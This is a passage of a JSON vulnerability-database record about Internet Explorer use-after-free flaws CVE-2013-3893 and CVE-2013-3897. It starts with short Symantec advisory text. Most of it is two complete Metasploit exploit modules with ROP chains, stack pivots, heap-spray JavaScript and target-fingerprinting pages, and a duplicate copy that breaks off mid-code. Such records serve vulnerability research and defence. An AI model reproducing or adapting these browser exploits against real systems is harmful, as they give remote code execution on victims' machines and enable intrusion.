be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-10-08T00:00:00", "published": "2013-10-08T00:00:00", "id": "SMNTC-62811", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/62811", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-3897 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T20:41:46", "bulletinFamily": "software", "cvelist": ["CVE-2013-3893"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Internet Explorer versions 6, 7, 8, 9, 10, and 11 are affected.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing Standard \n * Avaya CallPilot \n * Avaya Communication Server 1000 Telephony Manager \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-09-17T00:00:00", "published": "2013-09-17T00:00:00", "id": "SMNTC-62453", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/62453", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-3893 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:54", "description": "", "published": "2013-10-14T00:00:00", "type": "packetstorm", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893", "CVE-2013-3897"], "modified": "2013-10-14T00:00:00", "id": "PACKETSTORM:123603", "href": "https://packetstormsecurity.com/files/123603/MS13-080-Microsoft-Internet-Explorer-CDisplayPointer-Use-After-Free.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => NormalRanking \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. It was originally \nfound being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, \naround the same time frame as CVE-2013-3893, except this was kept out of the public eye by \nmultiple research companies and the vendor until the October patch release. \n \nThis issue is a use-after-free vulnerability in CDisplayPointer via the use of a \n\"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft \nthe DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. \nIf we use a select() function for the CTextArea element, two important things will happen: \na CDisplayPointer object will be created for CTextArea, and it will also trigger another \nevent called \"onselect\". The \"onselect\" event will allow us to set up for the actual event \nhandler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child \nof CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger \n\"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer \nobject can be forced by using an \"Unslect\" (other approaches also apply), but a reference \nof this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after \nthe CDoc::GetLineInfo call, because it is still trying to use that to update \nCDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash \nfinally occurs due to accessing the freed memory. By controlling this freed memory, it is \npossible to achieve arbitrary code execution under the context of the user. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Exploit in the wild \n'sinn3r' # Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2013-3897' ], \n[ 'OSVDB', '98207' ], \n[ 'MSB', 'MS13-080' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ], \n[ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', {} ], \n[ 'IE 8 on Windows 7', {} ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Privileged' => false, \n# Jsunpack first received a sample to analyze on Sep 12 2013. \n# MSFT patched this on Oct 8th. \n'DisclosureDate' => \"Oct 08 2013\", \n'DefaultTarget' => 0)) \nend \n \ndef get_check_html \n%Q|<html> \n<script> \n#{js_os_detect} \n \nfunction os() { \nvar detect = window.os_detect.getVersion(); \nvar os_string = detect.os_name + \" \" + detect.os_flavor + \" \" + detect.ua_name + \" \" + detect.ua_version; \nreturn os_string; \n} \n \nfunction dll() { \nvar checka = 0; \nvar checkb = 0; \ntry { \nchecka = new ActiveXObject(\"SharePoint.OpenDocuments.4\"); \n} catch (e) {} \n \ntry { \ncheckb = new ActiveXObject(\"SharePoint.OpenDocuments.3\"); \n} catch (e) {} \n \nif ((typeof checka) == \"object\" && (typeof checkb) == \"object\") { \ntry{location.href='ms-help://'} catch(e){} \nreturn \"#{@js_office_2010_str}\"; \n} \nelse if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") { \ntry{location.href='ms-help://'} catch(e){} \nreturn \"#{@js_office_2007_str}\"; \n} \nreturn \"#{@js_default_str}\"; \n} \n \nwindow.onload = function() { \nwindow.location = \"#{get_resource}/search?o=\" + escape(os()) + \"&d=\" + dll(); \n} \n</script> \n</html> \n| \nend \n \ndef junk \nrand_text_alpha(4).unpack(\"V\")[0].to_i \nend \n \ndef get_payload(target_info) \nrop_payload = '' \nos = target_info[:os] \ndll_used = '' \n \ncase target_info[:dll] \nwhen @js_office_2007_str \ndll_used = \"Office 2007\" \n \npivot = \n[ \n0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4 \njunk, # ESI due to POPAD \njunk, # EBP due to POPAD \njunk, \njunk, # EBX due to POPAD \njunk, # EDX due to POPAD \njunk, # ECX due to POPAD \n0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction) \n0x51bd81db, # ROP NOP \njunk # Padding for the retn 4 from the stack pivot \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot}) \n \nwhen @js_office_2010_str \ndll_used = \"Office 2010\" \n \npivot = \n[ \n0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4 \njunk, \njunk, \njunk, \njunk, \njunk, \n0x51BE7E9A, # ROP NOP \njunk # Padding for the retn 4 from the stack pivot \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot}) \n \nwhen @js_default_str \nif target_info[:os] =~ /windows xp/i \n# XP uses msvcrt.dll \ndll_used = \"msvcrt\" \n \npivot = \n[ \n0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot}) \nelse \n# Assuming this is Win 7, and we'll use Java 6 ROP \ndll_used = \"Java\" \n \npivot = \n[ \n0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn \njunk # Padding for the POP ECX \n].pack(\"V*\") \n \nrop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) \nend \nend \n \nprint_status(\"Target uses #{os} with #{dll_used} DLL\") \n \nrop_payload \nend \n \ndef get_sploit_html(target_info) \nos = target_info[:os] \njs_payload = '' \n \nif os =~ /Windows (7|XP) MSIE 8\\.0/ \njs_payload = Rex::Text.to_unescape(get_payload(target_info)) \nelse \nprint_error(\"Target not supported by this attack.\") \nreturn \"\" \nend \n \n%Q|<html> \n<head> \n<script> \n#{js_property_spray} \nsprayHeap({shellcode:unescape(\"#{js_payload}\")}); \n \nvar earth = document; \nvar data = \"\"; \nfor (i=0; i<17; i++) { \nif (i==7) { data += unescape(\"%u2020%u2030\"); } \nelse { data += \"\\\\u4141\\\\u4141\"; } \n} \ndata += \"\\\\u4141\"; \n \nfunction butterfly() { \nfor(i=0; i<20; i++) { \nvar effect = earth.createElement(\"div\"); \neffect.className = data; \n} \n} \n \nfunction kaiju() { \nvar godzilla = earth.createElement(\"textarea\"); \nvar minilla = earth.createElement(\"pre\"); \nearth.body.appendChild(godzilla); \nearth.body.appendChild(minilla); \ngodzilla.appendChild(minilla); \n \ngodzilla.onselect=function(e) { \nminilla.swapNode(earth.createElement(\"div\")); \n} \n \nvar battleStation = false; \nvar war = new Array(); \ngodzilla.onpropertychange=function(e) { \nif (battleStation == true) { \nfor (i=0; i<50; i++) { \nwar.push(earth.createElement(\"span\")); \n} \n} \n \nearth.execCommand(\"Unselect\"); \n \nif (battleStation == true) { \nfor (i=0; i < war.length; i++) { \nwar[i].className = data; \n} \n} \nelse { \nbattleStation = true; \n} \n} \n \nbutterfly(); \ngodzilla.select(); \n} \n</script> \n</head> \n<body onload='kaiju()'> \n</body> \n</html> \n| \nend \n \n \ndef on_request_uri(cli, request) \nif request.uri =~ /search\\?o=(.+)\\&d=(.+)$/ \ntarget_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) } \nsploit = get_sploit_html(target_info) \nsend_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) \nreturn \nend \n \nhtml = get_check_html \nprint_status(\"Checking out target...\") \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) \nend \n \ndef exploit \n@js_office_2007_str = Rex::Text.rand_text_alpha(4) \n@js_office_2010_str = Rex::Text.rand_text_alpha(5) \n@js_default_str = Rex::Text.rand_text_alpha(6) \nsuper \nend \n \nend \n \n \n=begin \n \n+hpa this for debugging or you might not see a crash at all :-) \n \n0:005> r \neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c \neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \nmshtml!QIClassID+0x30: \n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=???????? \n0:005> u \nmshtml!QIClassID+0x30: \n6d6dc123 8b03 mov eax,dword ptr [ebx] \n6d6dc125 8365e800 and dword ptr [ebp-18h],0 \n6d6dc129 8d4de8 lea ecx,[ebp-18h] \n6d6dc12c 51 push ecx \n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170) \n6d6dc132 53 push ebx \n6d6dc133 bf02400080 mov edi,80004002h \n6d6dc138 ff10 call dword ptr [eax] \n \n=end \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123603/ms13_080_cdisplaypointer.rb.txt"}, {"lastseen": "2016-12-05T22:25:17", "description": "", "published": "2013-09-30T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2013-09-30T00:00:00", "id": "PACKETSTORM:123457", "href": "https://packetstormsecurity.com/files/123457/Microsoft-Internet-Explorer-SetMouseCapture-Use-After-Free.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Micorosft Internet Explorer SetMouseCapture Use-After-Free\", \n'Description' => %q{ \nThis module exploits a use-after-free vulnerability that currents targets Internet \nExplorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. \nIt was initially found in the wild in Japan, but other regions such as English, \nChinese, Korean, etc, were targeted as well. \n \nThe vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a \nreference during an event. An attacker first can setup two elements, where the second \nis the child of the first, and then setup a onlosecapture event handler for the parent \nelement. The onlosecapture event seems to require two setCapture() calls to trigger, \none for the parent element, one for the child. When the setCapture() call for the child \nelement is called, it finally triggers the event, which allows the attacker to cause an \narbitrary memory release using document.write(), which in particular frees up a 0x54-byte \nmemory. The exact size of this memory may differ based on the version of IE. After the \nfree, an invalid reference will still be kept and pass on to more functions, eventuall \nthis arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary \ncode execution) when this function attempts to use this reference to call what appears to \nbe a PrivateQueryInterface due to the offset (0x00). \n \nTo mimic the same exploit found in the wild, this module will try to use the same DLL \nfrom Microsoft Office 2007 or 2010 to leverage the attack. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Exploit in the wild first spotted in Japan \n'sinn3r' # Metasploit (thx binjo for the heads up!) \n], \n'References' => \n[ \n[ 'CVE', '2013-3893' ], \n[ 'OSVDB', '97380' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000 \n}, \n'DefaultOptions' => \n{ \n'PrependMigrate' => true, \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Privileged' => false, \n'DisclosureDate' => \"Sep 17 2013\", \n'DefaultTarget' => 0)) \nend \n \ndef is_win7_ie9?(agent) \n(agent =~ /MSIE 9/ and agent =~ /Windows NT 6\\.1/) \nend \n \ndef get_preq_html(cli, req) \n%Q| \n<html> \n<script> \nfunction getDLL() { \nvar checka = 0; \nvar checkb = 0; \n \ntry { \nchecka = new ActiveXObject(\"SharePoint.OpenDocuments.4\"); \n} catch (e) {} \n \ntry { \ncheckb = new ActiveXObject(\"SharePoint.OpenDocuments.3\"); \n} catch (e) {} \n \nif ((typeof checka) == \"object\" && (typeof checkb) == \"object\") { \nreturn \"office2010\"; \n} \nelse if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") { \nreturn \"office2007\"; \n} \n \nreturn \"na\"; \n} \n \nwindow.onload = function() { \ndocument.location = \"#{get_resource}/#{@exploit_page}?dll=\" + getDLL(); \n} \n</script> \n</html> \n| \nend \n \ndef junk \nreturn rand_text_alpha(4).unpack(\"V\")[0].to_i \nend \n \ndef get_payload(rop_dll) \ncode = payload.encoded \nrop = '' \np = '' \n \ncase rop_dll \nwhen :office2007 \nrop = \n[ \njunk, # Alignment \n0x51c46f91, # POP EBP # RETN [hxds.dll] \n0x51c46f91, # skip 4 bytes [hxds.dll] \n0x51c35a4d, # POP EBX # RETN [hxds.dll] \n0xffffffff, \n0x51bd90fd, # INC EBX # RETN [hxds.dll] \n0x51bd90fd, # INC EBX # RETN [hxds.dll] \n0x51bfa98e, # POP EDX # RETN [hxds.dll] \n0xffffefff, \n0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51c1df88, # NEG EAX # RETN [hxds.dll] \n0x51c55c45, # DEC EAX, RETN [hxds.dll] \n0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51c4c17c, # POP ECX # RETN [hxds.dll] \n0xffffffc0, \n0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51c1df88, # NEG EAX # RETN [hxds.dll] \n0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51c05766, # POP EDI # RETN [hxds.dll] \n0x51bfbaaf, # RETN (ROP NOP) [hxds.dll] \n0x51c2e77d, # POP ESI # RETN [hxds.dll] \n0x51bfc840, # JMP [EAX] [hxds.dll] \n0x51c05266, # POP EAX # RETN [hxds.dll] \n0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll] \n0x51bdf91f, # PUSHAD # RETN [hxds.dll] \n0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll] \n].pack(\"V*\") \n \nwhen :office2010 \nrop = \n[ \n# 4 dword junks due to the add esp in stack pivot \njunk, \njunk, \njunk, \njunk, \n0x51c41953, # POP EBP # RETN [hxds.dll] \n0x51be3a03, # RETN (ROP NOP) [hxds.dll] \n0x51c41953, # skip 4 bytes [hxds.dll] \n0x51c4486d, # POP EBX # RETN [hxds.dll] \n0xffffffff, \n0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] \n0x51bd1a77, # INC EAX # RETN [hxds.dll] \n0x51bd1a77, # INC EAX # RETN [hxds.dll] \n0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] \n0x51bfa298, # POP EDX # RETN [hxds.dll] \n0xffffefff, \n0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] \njunk, \n0x51bd5382, # DEC EAX # RETN [hxds.dll] \n0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] \n0x51c1f094, # POP ECX # RETN [hxds.dll] \n0xffffffc0, \n0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] \njunk, \n0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] \n0x51bf1ff0, # POP EDI # RETN [hxds.dll] \n0x51bd5383, # RETN (ROP NOP) [hxds.dll] \n0x51c07c8b, # POP ESI # RETN [hxds.dll] \n0x51bfc7cb, # JMP [EAX] [hxds.dll] \n0x51c44707, # POP EAX # RETN [hxds.dll] \n0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll] \n0x51c3604e, # PUSHAD # RETN [hxds.dll] \n0x51c541ef, # ptr to 'jmp esp' [hxds.dll] \n].pack(\"V*\") \nend \n \np = rop + code \np \nend \n \ndef get_exploit_html(cli, req, rop_dll) \ngadgets = {} \ncase rop_dll \nwhen :office2007 \ngadgets[:spray1] = 0x1af40020 \n \n# 0x31610020-0xc4, pointer to gadgets[:call_eax] \ngadgets[:target] = 0x3160ff5c \n \n# mov eax, [esi] \n# push esi \n# call [eax+4] \ngadgets[:call_eax] = 0x51bd1ce8 \n \n# xchg eax,esp \n# add byte [eax], al \n# pop esi \n# mov [edi+23c], ebp \n# mov [edi+238], ebp \n# mov [edi+234], ebp \n# pop ebp \n# pop ebx \n# ret \ngadgets[:pivot] = 0x51be4418 \n \nwhen :office2010 \ngadgets[:spray1] = 0x1a7f0020 \n \n# 0x30200020-0xc4, pointer to gadgets[:call_eax] \ngadgets[:target] = 0x301fff5c \n \n# mov eax, [esi] \n# push esi \n# call [eax+4] \ngadgets[:call_eax] = 0x51bd1a41 \n \n# xchg eax,esp \n# add eax,dword ptr [eax] \n# add esp,10 \n# mov eax,esi \n# pop esi \n# pop ebp # retn 4 \ngadgets[:pivot] = 0x51c00e64 \nend \n \np1 = \n[ \ngadgets[:target], # Target address \ngadgets[:pivot] # stack pivot \n].pack(\"V*\") \n \np1 << get_payload(rop_dll) \n \np2 = \n[ \ngadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax) \n].pack(\"V*\") \n \njs_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\")) \njs_p1 = Rex::Text.to_unescape(p1) \njs_p2 = Rex::Text.to_unescape(p2) \n \n%Q| \n<html> \n<script> \n#{js_property_spray} \n \nfunction loadOffice() { \ntry{location.href='ms-help://'} catch(e){} \n} \n \nvar a = new Array(); \nfunction spray() { \nvar obj = ''; \nfor (i=0; i<20; i++) { \nif (i==0) { obj += unescape(\"#{js_s1}\"); } \nelse { obj += \"\\\\u4242\\\\u4242\"; } \n} \nobj += \"\\\\u5555\"; \n \nfor (i=0; i<10; i++) { \nvar e = document.createElement(\"div\"); \ne.className = obj; \na.push(e); \n} \n \nvar s1 = unescape(\"#{js_p1}\"); \nsprayHeap({shellcode:s1, maxAllocs:0x300}); \nvar s2 = unescape(\"#{js_p2}\"); \nsprayHeap({shellcode:s2, maxAllocs:0x300}); \n} \n \nfunction hit() \n{ \nvar id_0 = document.createElement(\"sup\"); \nvar id_1 = document.createElement(\"audio\"); \n \ndocument.body.appendChild(id_0); \ndocument.body.appendChild(id_1); \nid_1.applyElement(id_0); \n \nid_0.onlosecapture=function(e) { \ndocument.write(\"\"); \nspray(); \n} \n \nid_0['outerText']=\"\"; \nid_0.setCapture(); \nid_1.setCapture(); \n} \n \nfor (i=0; i<20; i++) { \ndocument.createElement(\"frame\"); \n} \n \nwindow.onload = function() { \nloadOffice(); \nhit(); \n} \n</script> \n</html> \n| \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nunless is_win7_ie9?(agent) \nprint_error(\"Not a suitable target: #{agent}\") \nsend_not_found(cli) \nend \n \nhtml = '' \nif request.uri =~ /\\?dll=(\\w+)$/ \nrop_dll = '' \nif $1 == 'office2007' \nprint_status(\"Using Office 2007 ROP chain\") \nrop_dll = :office2007 \nelsif $1 == 'office2010' \nprint_status(\"Using Office 2010 ROP chain\") \nrop_dll = :office2010 \nelse \nprint_error(\"Target does not have Office installed\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = get_exploit_html(cli, request, rop_dll) \nelse \nprint_status(\"Checking target requirements...\") \nhtml = get_preq_html(cli, request) \nend \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) \nend \n \ndef exploit \n@exploit_page = \"default.html\" \nsuper \nend \n \nend \n \n=begin \n \nhxds.dll (Microsoft\u00ae Help Data Services Module) \n \n2007 DLL info: \nProductVersion: 2.05.50727.198 \nFileVersion: 2.05.50727.198 (QFE.050727-1900) \n \n2010 DLL info: \nProductVersion: 2.05.50727.4039 \nFileVersion: 2.05.50727.4039 (QFE.050727-4000) \n \nmshtml.dll \nProductVersion: 9.00.8112.16446 \nFileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) \nFileDescription: Microsoft (R) HTML Viewer \n \n \n0:005> r \neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 \neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \nMSHTML!CTreeNode::GetInterface+0xd8: \n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? \n \n \n66e13df7 8b0e mov ecx,dword ptr [esi] \n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000) \n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] \n66e13e01 ffd0 call eax \n \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123457/ie_setmousecapture_uaf.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T17:39:39", "description": "No description provided by source.", "published": "2013-09-18T00:00:00", "type": "seebug", "title": "Microsoft IE MSHTML\u5185\u5b58\u7834\u574f\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-3893)", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2013-09-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61034", "id": "SSV:61034", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:41:39", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82516", "id": "SSV:82516", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => "8.0",\r\n :ua_maxver => "8.0",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => NormalRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\r\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\r\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\r\n multiple research companies and the vendor until the October patch release.\r\n\r\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\r\n "onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft\r\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\r\n If we use a select() function for the CTextArea element, two important things will happen:\r\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\r\n event called "onselect". The "onselect" event will allow us to set up for the actual event\r\n handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child\r\n of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger\r\n "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer\r\n object can be forced by using an "Unslect" (other approaches also apply), but a reference\r\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\r\n the CDoc::GetLineInfo call, because it is still trying to use that to update\r\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\r\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\r\n possible to achieve arbitrary code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3897' ],\r\n [ 'OSVDB', '98207' ],\r\n [ 'MSB', 'MS13-080' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],\r\n [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', {} ],\r\n [ 'IE 8 on Windows 7', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\x00",\r\n 'PrependEncoder' => "\\x81\\xc4\\x0c\\xfe\\xff\\xff" # add esp, -500\r\n 